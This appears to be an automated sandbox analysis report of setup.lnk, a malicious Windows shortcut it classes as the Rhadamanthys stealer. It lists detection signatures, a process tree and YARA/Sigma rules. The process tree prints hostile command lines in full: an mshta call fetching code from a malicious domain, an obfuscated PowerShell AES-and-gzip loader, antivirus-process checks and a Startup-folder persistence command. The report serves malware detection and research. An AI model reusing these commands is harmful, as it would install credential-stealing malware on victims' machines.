Edit tour
Windows
Analysis Report
setup.lnk
Overview
General Information
| Sample name: | setup.lnk |
| Analysis ID: | 1395713 |
| MD5: | a69e28c995425fb3d3723b45c18ac227 |
| SHA1: | afebe09ea1516f1378b6254ee6bc927501e24c96 |
| SHA256: | 1c7476c33f0d56e970dbfad87da96739d74bbd1928c4a044715ea75f61e72192 |
| Tags: | lnk |
| Infos: |   |
 | |
Detection
RHADAMANTHYS
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Windows shortcut file (LNK) starts blacklisted processes
Yara detected RHADAMANTHYS Stealer
Contains functionality to register a low level keyboard hook
Drops PE files with a suspicious file extension
Found URL in windows shortcut file (LNK)
Found suspicious powershell code related to unpacking or dynamic code loading
Powershell drops PE file
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Suspicious powershell command line found
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Windows shortcut file (LNK) contains suspicious command line arguments
Abnormal high CPU Usage
Contains functionality to detect virtual machines (SLDT)
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file does not import any functions
PE file overlay found
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Gzip Archive Decode Via PowerShell
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Stores files to the Windows start menu directory
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic
Yara signature match
Classification
- System is w10x64
forfiles.exe (PID: 4320 cmdline: "C:\Window s\System32 \forfiles. exe" /p C: \Windows\V ss /c "pow ershell st art mshta http://whi temansearc h.shop/set up MD5: 9BB67AEA5E26CB136F23F29CC48D6B9E) 
conhost.exe (PID: 3792 cmdline: C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
powershell.exe (PID: 4672 cmdline: start msht a http://w hitemansea rch.shop/s etup MD5: 04029E121A0CFA5991749937DD22A1D9) 
mshta.exe (PID: 7216 cmdline: "C:\Window s\system32 \mshta.exe " http://w hitemansea rch.shop/s etup MD5: 0B4340ED812DC82CE636C00FA5C9BEF2) - powershell.exe (PID: 7364 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -w 1 -ep U nrestricte d -nop $gI WXcqO = 'A AAAAAAAAAA AAAAAAAAAA H+Ni+e0B2k s3MmnD0sjp K+fk7MupFI LZ9VVeKtme +yyv7VBgri arnlhwOcDd 3XnPYAZs1T ppp56hNLmk nzg3RqlLZo Www3pr9GTV i4PQRFZ4Ym gg1kiMEK8k 6tSH0FMP/6 pzSLCCm7m3 43xSrtqho7 1KivioXDdV 9RXUEizSVv /r8WV5Pa7k 2Heaf/g1dN AET06jn6Lw y+3XxYBIZ8 Z2SgFrwiak MLK9DaB/lE ruY0OeDX+H dr0opeUvoD L8s3TYxPu5 55rLX05cTD 0ToGQ2y+lN PX6Fd4Bm0m fpAp0pqtz0 Trl0pba/49 9qW6oyZTYg ixjQ47fiyt qQcaIZP9Wk wPlfVpxMSu a7NOylmdcJ hQWUYN6kEA SQ952Ex0UE paIptSXAQO A6loYOMEfP b1EVPJ3uzM pl9BHjDqJh N1/oLox0/a PLc7VbmQV7 FidtYCO5ez ZrtDcgspB4 G8S6VZ9Sjg 0QNg+jHmUf YdvDUMhXrj 23a1QyqUbS LMhJDW4sND Uud7HtFVqe AGS/Sl3nlu TQKPifMztt y2aLUs2SdQ 4ofB+z/wvU Pl80+6+LH5 XqNj8M1Zd2 OZ2juaG9QC dS6eD1lwBd fwkGK1Cexw fukroqw+5t 52gJ98O+jL N7pAgKZCbb 87QC9doFNV Z0xR6NVkJ3 ydwbpVe9gy 2uRSQ2Smek c28xEG/oGb v4H/40VYmm Q48SZmio+D L98HetDuYJ DA10+uKtzg 0ZRZ9tre7n 2DUAlC7aKH FKe8XXTlSj eBJaB+74Tb yhG6tbN3q8 JEsTWFHavC G/74qYRYHv 51RGapuS4Y imLfGDcI+k N5tHO8qHFY 2APvSJgWWv c4NaNwYwKE OdGVs3cuD2 h7Z0Etr930 +QCfF';$PA vNVyn = 'e W1FbE1LT2R GdGV3TXdRU lpyWFFRbnZ GeFdtd1R3Z 2w=';$Hgjh dnd = New- Object 'Sy stem.Secur ity.Crypto graphy.Aes Managed';$ Hgjhdnd.Mo de = [Syst em.Securit y.Cryptogr aphy.Ciphe rMode]::EC B;$Hgjhdnd .Padding = [System.S ecurity.Cr yptography .PaddingMo de]::Zeros ;$Hgjhdnd. BlockSize = 128;$Hgj hdnd.KeySi ze = 256;$ Hgjhdnd.Ke y = [Syste m.Convert] ::FromBase 64String($ PAvNVyn);$ fmSHI = [S ystem.Conv ert]::From Base64Stri ng($gIWXcq O);$HwKLSI Pl = $fmSH I[0..15];$ Hgjhdnd.IV = $HwKLSI Pl;$bKVkoZ aIu = $Hgj hdnd.Creat eDecryptor ();$woNqXS fkI = $bKV koZaIu.Tra nsformFina lBlock($fm SHI, 16, $ fmSHI.Leng th - 16);$ Hgjhdnd.Di spose();$L MMKhz = Ne w-Object S ystem.IO.M emoryStrea m( , $woNq XSfkI );$d YlrlK = Ne w-Object S ystem.IO.M emoryStrea m;$cYowFoT fZ = New-O bject Syst em.IO.Comp ression.Gz ipStream $ LMMKhz, ([ IO.Compres sion.Compr essionMode ]::Decompr ess);$cYow FoTfZ.Copy To( $dYlrl K );$cYowF oTfZ.Close ();$LMMKhz .Close();[ byte[]] $O hXploZ = $ dYlrlK.ToA rray();$mk eeaJ = [Sy stem.Text. Encoding]: :UTF8.GetS tring($OhX ploZ);$mke eaJ | powe rshell - MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 7372 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 7488 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" - MD5: 04029E121A0CFA5991749937DD22A1D9) 
chrome.exe (PID: 7596 cmdline: "C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --st art-maximi zed --sing le-argumen t https:// 2no.co/2Zr Vm4 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4) - chrome.exe (PID: 7832 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --mojo-pla tform-chan nel-handle =2056 --fi eld-trial- handle=197 2,i,990812 4520727013 637,160523 5988742215 4875,26214 4 --disabl e-features =Optimizat ionGuideMo delDownloa ding,Optim izationHin ts,Optimiz ationHints Fetching,O ptimizatio nTargetPre diction /p refetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4) 
WmiPrvSE.exe (PID: 7252 cmdline: C:\Windows \system32\ wbem\wmipr vse.exe -s ecured -Em bedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51) 
ClassroomEc.exe (PID: 8148 cmdline: "C:\Users\ user\AppDa ta\Roaming \Classroom Ec.exe" MD5: 956D074F7C6BD174C43586F07892E820) - conhost.exe (PID: 8112 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 748 cmdline:
"C:\Window s\System32 \cmd.exe" /k move Av oid Avoid. bat & Avoi d.bat & ex it MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 5060 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - tasklist.exe (PID: 6096 cmdline:
tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1) - findstr.exe (PID: 8084 cmdline:
findstr /I "avastui. exe avgui. exe nswscs vc.exe sop hoshealth. exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E) - tasklist.exe (PID: 4980 cmdline:
tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1) - findstr.exe (PID: 2764 cmdline:
findstr /I "wrsa.exe opssvc.ex e" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E) - cmd.exe (PID: 8224 cmdline:
cmd /c md 29026 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - cmd.exe (PID: 8240 cmdline:
cmd /c cop y /b Produ cing + Ima ging + Phd + Ada + O rgan 29026 \Identific ation.pif MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - cmd.exe (PID: 8256 cmdline:
cmd /c cop y /b Conf 29026\m MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) 
Identification.pif (PID: 8272 cmdline: 29026\Iden tification .pif 29026 \m MD5: 848164D084384C49937F99D5B894253E) - cmd.exe (PID: 8616 cmdline:
cmd /k ech o [Interne tShortcut] > "C:\Use rs\user\Ap pData\Roam ing\Micros oft\Window s\Start Me nu\Program s\Startup\ NeuraLink. url" & ech o URL="C:\ Users\user \AppData\L ocal\Neura Connect Te chnologies \NeuraLink .js" >> "C :\Users\us er\AppData \Roaming\M icrosoft\W indows\Sta rt Menu\Pr ograms\Sta rtup\Neura Link.url" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - PING.EXE (PID: 8288 cmdline:
ping -n 5 localhost MD5: B3624DD758CCECF93A1226CEF252CA12)
- svchost.exe (PID: 7292 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- cleanup
| Name | Description | Attribution | Blogpost URLs | Link |
|---|---|---|---|---|
| Rhadamanthys | According to PCrisk, Rhadamanthys is a stealer-type malware, and as its name implies - it is designed to extract data from infected machines.At the time of writing, this malware is spread through malicious websites mirroring those of genuine software such as AnyDesk, Zoom, Notepad++, and others. Rhadamanthys is downloaded alongside the real program, thus diminishing immediate user suspicion. These sites were promoted through Google ads, which superseded the legitimate search results on the Google search engine. |
⊘No configs have been found
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_RHADAMANTHYS | Yara detected RHADAMANTHYS Stealer | Joe Security | ||
| JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | ||
| JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | ||
| INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
| |
| INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
| |
| Click to see the 1 entries | ||||
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | ||
| JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | ||
| JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
|
System Summary |   |
|---|
| Source: | Author: Florian Roth (Nextron Systems): | ||